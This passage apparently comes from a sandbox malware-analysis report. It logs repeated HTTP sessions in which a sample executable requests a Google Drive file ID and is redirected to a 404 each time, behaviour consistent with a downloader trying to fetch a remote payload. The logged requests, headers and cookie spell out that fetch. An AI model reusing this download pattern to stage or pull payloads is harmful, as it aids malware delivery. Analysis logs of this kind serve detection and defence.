                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:23 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Oplx4vLeMGArS_t-XBq3yA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                22 | 192.168.2.9 | 49733 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:24 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:24 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:24 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: script-src 'nonce-6d4IpyEytAyYbs0vqGMRQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                23 | 192.168.2.9 | 49734 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:25 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:25 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgRO57T2K7colnyhwUvPUvlJmClTN9Ob3CWxV8jFKMtVDfC1neRRWjhIEJghe4-4lq6P3JXQZmk
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:25 GMT
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce--1ESJaz01lvLRX6oC-dW-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:25 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xSC-FK5neXGHsMPHPzOoiQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                24 | 192.168.2.9 | 49735 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:26 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:27 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:26 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-fynV8uMp6SS_WF_GoMrpAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                25 | 192.168.2.9 | 49736 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:27 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:28 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFiumC6tVDUW1WOIG1l1VGlPaLlJl5tH4LRkzvxkdnlbxdyicur_gge-AhAC1aq24tFfihqwd2G7u9M
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:27 GMT
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: script-src 'nonce-x_mUsV-kCI9W_X2uyM-4Og' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:28 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="H1Z8c57gOTHh7ecUgBu1qQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                26 | 192.168.2.9 | 49737 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:29 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:29 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:29 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-cvFigcL0927iD-s3uyQBBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                27 | 192.168.2.9 | 49738 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:30 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:30 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFiumC53rXWdShk70ZKEUjonQe00GcMxIFVLx0w08FqAmCDSz4spfPG5YL6nNnEH29zZOocyeIC6yJU
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:30 GMT
                                                                Content-Security-Policy: script-src 'nonce-fpRRdPgB7GNO4OZkEKV_MA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:30 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZEfrz73IPu5g3Ks1fD5zoQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                28 | 192.168.2.9 | 49739 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:31 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:31 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:31 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-DSpJQRn-wEpmI1PdOY5woA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                29 | 192.168.2.9 | 49740 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:32 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:32 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgRVR5IzLRpnnnxydUREqmjRS7TJXteTZSvxFEPKRB1WsvUXnEBhfS63MbCjSUIKq2GP82x9zjE
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:32 GMT
                                                                Content-Security-Policy: script-src 'nonce-oE9DqlJ-biK9lOHqag4IXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:32 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CDSkoQzTgOoyjeS7nrMRtg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                30 | 192.168.2.9 | 49741 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:33 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
